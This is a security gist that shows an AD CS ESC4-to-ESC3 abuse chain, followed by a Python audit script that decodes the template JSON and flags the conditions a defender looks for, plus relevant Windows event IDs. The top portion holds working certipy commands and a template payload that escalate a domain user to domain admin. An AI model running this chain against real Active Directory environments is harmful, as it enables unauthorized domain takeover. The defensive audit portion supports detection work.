@zimnyaa
Created September 30, 2024 10:46
A simple way to abuse ESC4 without introducing ESC1 (creating an Enrollment Agent template instead).
# the policy JSON template for certipy is:
# {"showInAdvancedViewOnly": ["54525545"], "nTSecurityDescriptor": ["0100049c3000000000000000000000001400000002001c000100000000001400ff010f0001010000000000050b000000010500000000000515000000c8a31fdde9bab8902cae73bbf4010000"], "flags": ["313331363136"], "pKIDefaultKeySpec": ["32"], "pKIKeyUsage": ["8000"], "pKIMaxIssuingDepth": ["30"], "pKICriticalExtensions": ["322e352e32392e37", "322e352e32392e3135"], "pKIExpirationPeriod": ["004039872ee1feff"], "pKIOverlapPeriod": ["0080a60affdeffff"], "pKIExtendedKeyUsage": ["312e332e362e312e342e312e3331312e32302e322e31"], "pKIDefaultCSPs": ["312c4d6963726f736f667420456e68616e6365642043727970746f677261706869632050726f76696465722076312e30", "322c4d6963726f736f667420426173652043727970746f677261706869632050726f76696465722076312e30"], "msPKI-RA-Signature": ["30"], "msPKI-Enrollment-Flag": ["3332"], "msPKI-Private-Key-Flag": ["3136383432373532"], "msPKI-Certificate-Name-Flag": ["3333353534343332"], "msPKI-Minimal-Key-Size": ["32303438"], "msPKI-Certificate-Application-Policy": ["312e332e362e312e342e312e3331312e32302e322e31"]}
# if broken, get one from a lab instead: https://github.com/arth0sz/Practice-AD-CS-Domain-Escalation
~$ certipy template -u domainuser@lab.local -p password -dc-ip 10.3.10.11 -template ESC4 -configuration set-ESC3.json -save-old # set the template to ESC3
~$ certipy req -u domainuser@lab.local -p password -ca myCA -target 10.3.10.11 -template ESC4 # get the Enrollment Agent PFX
~$ certipy req -u domainuser@lab.local -p password -ca myCA -target 10.3.10.11 -template User -on-behalf-of 'lab\domainadmin' -pfx domainuser.pfx # use the Enrollment Agent Cert
~$ certipy auth -pfx domainadmin.pfx -dc-ip 10.3.10.11 -debug # auth
~$ certipy template -u domainuser@lab.local -p password -dc-ip 10.3.10.11 -template ESC4 -configuration ESC4.json # restore
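The configuration JSON above is what the whole trick turns on, so here is an added audit example (not the gist author's code, and not part of certipy) that decodes that exact JSON and reports the conditions a defender would look for: the Certificate Request Agent EKU with no authorized-signature (msPKI-RA-Signature) or manager-approval gate, plus a template DACL that lets every authenticated user rewrite the template (the ESC4 precondition). It assumes certipy's encoding as the page shows it, namely each attribute value hex-encoded, with text attributes being the UTF-8 LDAP string and the four attributes in BINARY_ATTRS raw binary, and it only walks plain ACCESS_ALLOWED_ACEs; per-right object ACEs such as Enroll are skipped. The "before" snapshot in the demo is constructed for the comparison.

```python
import json
import struct

# Sample input: the certipy "template -configuration" JSON from this page, embedded verbatim.
# Each attribute maps to a list of hex-encoded values; text attributes are the UTF-8 bytes of
# the LDAP string, the attributes in BINARY_ATTRS are raw binary (an assumption drawn from the values).
ESC3_TEMPLATE_JSON = '{"showInAdvancedViewOnly": ["54525545"], "nTSecurityDescriptor": ["0100049c3000000000000000000000001400000002001c000100000000001400ff010f0001010000000000050b000000010500000000000515000000c8a31fdde9bab8902cae73bbf4010000"], "flags": ["313331363136"], "pKIDefaultKeySpec": ["32"], "pKIKeyUsage": ["8000"], "pKIMaxIssuingDepth": ["30"], "pKICriticalExtensions": ["322e352e32392e37", "322e352e32392e3135"], "pKIExpirationPeriod": ["004039872ee1feff"], "pKIOverlapPeriod": ["0080a60affdeffff"], "pKIExtendedKeyUsage": ["312e332e362e312e342e312e3331312e32302e322e31"], "pKIDefaultCSPs": ["312c4d6963726f736f667420456e68616e6365642043727970746f677261706869632050726f76696465722076312e30", "322c4d6963726f736f667420426173652043727970746f677261706869632050726f76696465722076312e30"], "msPKI-RA-Signature": ["30"], "msPKI-Enrollment-Flag": ["3332"], "msPKI-Private-Key-Flag": ["3136383432373532"], "msPKI-Certificate-Name-Flag": ["3333353534343332"], "msPKI-Minimal-Key-Size": ["32303438"], "msPKI-Certificate-Application-Policy": ["312e332e362e312e342e312e3331312e32302e322e31"]}'

BINARY_ATTRS = {"nTSecurityDescriptor", "pKIKeyUsage", "pKIExpirationPeriod", "pKIOverlapPeriod"}

OID_CERTIFICATE_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"  # Enrollment Agent EKU
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002  # msPKI-Enrollment-Flag bit: CA manager approval required
# Access-mask bits that let a principal rewrite the template object (the ESC4 precondition).
GENERIC_ALL, GENERIC_WRITE = 0x10000000, 0x40000000
WRITE_DAC, WRITE_OWNER, DS_WRITE_PROP = 0x00040000, 0x00080000, 0x00000020
TEMPLATE_CONTROL_RIGHTS = GENERIC_ALL | GENERIC_WRITE | WRITE_DAC | WRITE_OWNER | DS_WRITE_PROP
# Everyone and Authenticated Users; RID 513 (Domain Users) is matched by suffix below.
BROAD_SIDS = {"S-1-1-0", "S-1-5-11"}


def decode_template(config_json):
    """Turn certipy's hex-encoded configuration into strings (bytes for the binary attributes)."""
    decoded = {}
    for attr, values in json.loads(config_json).items():
        blobs = [bytes.fromhex(v) for v in values]
        decoded[attr] = blobs if attr in BINARY_ATTRS else [b.decode("utf-8") for b in blobs]
    return decoded


def sid_to_string(buf, off):
    """Parse the binary SID at buf[off:] into S-1-... text."""
    revision, sub_count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % sub_count, buf, off + 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def allowed_aces(sd):
    """Yield (sid, access_mask) for each ACCESS_ALLOWED_ACE in a self-relative security descriptor.
    Object ACEs (the per-right Enroll/AutoEnroll grants) are skipped: this walk only looks for
    principals that can rewrite the template as a whole."""
    dacl_off = struct.unpack_from("<I", sd, 16)[0]  # OffsetDacl lives at byte 16 of the header
    if dacl_off == 0:
        return
    ace_count = struct.unpack_from("<H", sd, dacl_off + 4)[0]  # ACL header: rev, sbz1, size, count
    off = dacl_off + 8
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == 0x00:  # ACCESS_ALLOWED_ACE_TYPE
            mask = struct.unpack_from("<I", sd, off + 4)[0]
            yield sid_to_string(sd, off + 8), mask
        off += ace_size


def template_findings(template):
    """Return the audit findings for one decoded template as short tags, in a fixed order."""
    findings = []
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    ekus |= set(template.get("msPKI-Certificate-Application-Policy", []))
    if OID_CERTIFICATE_REQUEST_AGENT in ekus:
        findings.append("agent-eku")
        if int(template.get("msPKI-RA-Signature", ["0"])[0]) == 0:
            findings.append("no-ra-signature")
        if not int(template.get("msPKI-Enrollment-Flag", ["0"])[0]) & CT_FLAG_PEND_ALL_REQUESTS:
            findings.append("no-manager-approval")
    for sid, mask in allowed_aces(template["nTSecurityDescriptor"][0]):
        if (sid in BROAD_SIDS or sid.endswith("-513")) and mask & TEMPLATE_CONTROL_RIGHTS:
            findings.append("template-writable-by:" + sid)
    return findings


def is_unrestricted_agent_template(template):
    """True when the template issues Enrollment Agent certificates with neither an RA signature nor approval gate."""
    return {"agent-eku", "no-ra-signature", "no-manager-approval"} <= set(template_findings(template))


def changed_attributes(before, after):
    """Attribute names whose values differ between two decoded snapshots (e.g. the -save-old copy and the live one)."""
    return sorted(a for a in set(before) | set(after) if before.get(a) != after.get(a))


if __name__ == "__main__":
    tpl = decode_template(ESC3_TEMPLATE_JSON)
    print("EKUs:", tpl["pKIExtendedKeyUsage"])
    print("findings:", template_findings(tpl))
    print("unrestricted agent template:", is_unrestricted_agent_template(tpl))
    # Constructed "before" snapshot: the same template carrying a client-authentication EKU instead.
    before = {**tpl, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
              "msPKI-Certificate-Application-Policy": ["1.3.6.1.5.5.7.3.2"]}
    print("changed:", changed_attributes(before, tpl))
```

Run it against the live export and the `-save-old` snapshot the page produces and `changed_attributes` names exactly the attributes that were rewritten; on the directory side the same edit shows up as event 5136 on the template object under the Public Key Services container when a SACL is set there, and the CA records template changes as events 4899 and 4900.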